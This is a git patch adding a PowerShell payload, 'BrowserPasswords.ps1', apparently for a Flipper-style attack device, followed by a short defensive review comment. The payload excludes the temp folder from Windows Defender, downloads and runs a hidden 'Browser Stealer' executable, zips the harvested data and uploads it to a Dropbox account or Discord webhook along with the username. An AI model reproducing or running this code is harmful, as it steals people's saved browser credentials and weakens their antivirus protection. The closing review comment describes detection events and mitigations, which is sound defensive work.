From a7489f5730d47a51ea1caf727039946a59661517 Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Wed, 28 Dec 2022 23:30:09 -0600
Subject: [PATCH] Update BrowserPasswords.ps1
---
.../BrowserPasswords.ps1 | 62 +++++++++++++++++++
1 file changed, 62 insertions(+)
diff --git a/Payloads/Flip-BrowserPasswords/BrowserPasswords.ps1 b/Payloads/Flip-BrowserPasswords/BrowserPasswords.ps1
index 8b13789..016874e 100644
--- a/Payloads/Flip-BrowserPasswords/BrowserPasswords.ps1
+++ b/Payloads/Flip-BrowserPasswords/BrowserPasswords.ps1
@@ -1 +1,63 @@ +function DropBox-Upload { +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName} + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName} + + + +# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download +Add-MpPreference -ExclusionPath $env:tmp + +# Download the exe and save it to temp directory +iwr "COMING SOON" -outfile "$env:tmp\browser.exe" + +# Execute the Browser Stealer +cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait + +# Exfiltrate the loot to discord +Compress-Archive -Path "$env:tmp\results" -DestinationPath 
$env:tmp\browserdata.zip +Upload-Discord -file "$env:tmp\browserdata.zip"
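Review bot: The comment above `Add-MpPreference -ExclusionPath $env:tmp` says "Add C:/ to exlusions", but the line excludes the temp directory from Microsoft Defender scanning, and the following lines write `browser.exe` into that same directory and start it with `-WindowStyle h` without any hash or signature check on what was fetched. For anyone triaging this file the comment should say what the line does, e.g. `# Excludes $env:tmp from Microsoft Defender scanning before an unverified binary is written there`. The sequence is observable on the host: a Defender exclusion change is recorded as event 5007 in the Defender operational log, and here it is followed by `Compress-Archive` of `$env:tmp\results` and an outbound `curl.exe -F` POST to the webhook held in `$dc`. Exclusions can only be added from an elevated session, so withholding local administrator rights and alerting on exclusion changes both interrupt this chain before the download runs.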